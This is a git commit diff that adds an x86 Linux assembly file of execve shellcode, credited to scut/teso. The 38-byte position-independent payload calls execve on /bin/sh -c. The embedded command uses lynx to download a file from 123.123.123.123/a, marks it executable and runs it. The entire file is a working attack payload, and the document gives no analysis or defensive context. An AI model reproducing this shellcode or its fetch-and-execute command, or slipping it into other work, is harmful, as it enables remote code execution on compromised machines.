From c9cbeced5b3f2bdd7407e29c0811e65954132540 Mon Sep 17 00:00:00 2001
From: Root THC
Date: Tue, 24 Feb 2026 12:42:47 +0000
Subject: initial

---
 other/tsig/shellcode/execve-shellcode.s | 49 +++++++++++++++++++++++++++++++++
 1 file changed, 49 insertions(+)
 create mode 100644 other/tsig/shellcode/execve-shellcode.s

(limited to 'other/tsig/shellcode/execve-shellcode.s')

diff --git a/other/tsig/shellcode/execve-shellcode.s b/other/tsig/shellcode/execve-shellcode.s
new file mode 100644
index 0000000..25015cf
--- /dev/null
+++ b/other/tsig/shellcode/execve-shellcode.s
@@ -0,0 +1,49 @@
+/* 38 byte arbitrary execve PIC linux/x86 shellcode - scut/teso */
+
+.data
+.globl	cbegin
+.globl	cend
+
+cbegin:
+
+	jmp	jahead
+
+docall:
+	pop	%edi
+
+	xorl	%eax, %eax		/* read number of arguments */
+	push	%eax
+	movb	(%edi), %al
+	inc	%edi
+
+decl1:	push	%edi
+decl2:	scasb				/* search delim bytes */
+	jnz	decl2
+
+	movb	%ah, -1(%edi)
+	dec	%eax
+	jnz	decl1
+
+	pop	%ebx			/* pathname */
+	push	%ebx
+
+	push	%eax
+	pop	%edx			/* esp -= 4, edx = &envp[] = NULL */
+	movl	%esp, %ecx		/* ecx = &argv[] */
+
+	movb	$11, %al
+	int	$0x80
+
+jahead:	call	docall
+
+/* reverse order arguments */
+.byte	0x03	/* number of arguments */
+.ascii	"lynx -source 123.123.123.123/a>a;chmod +x a;echo ./a"
+.byte	0x03
+.ascii	"-c"
+.byte	0x02
+.ascii	"/bin/sh"
+.byte	0x01
+
+cend:
+
-- 
cgit v1.3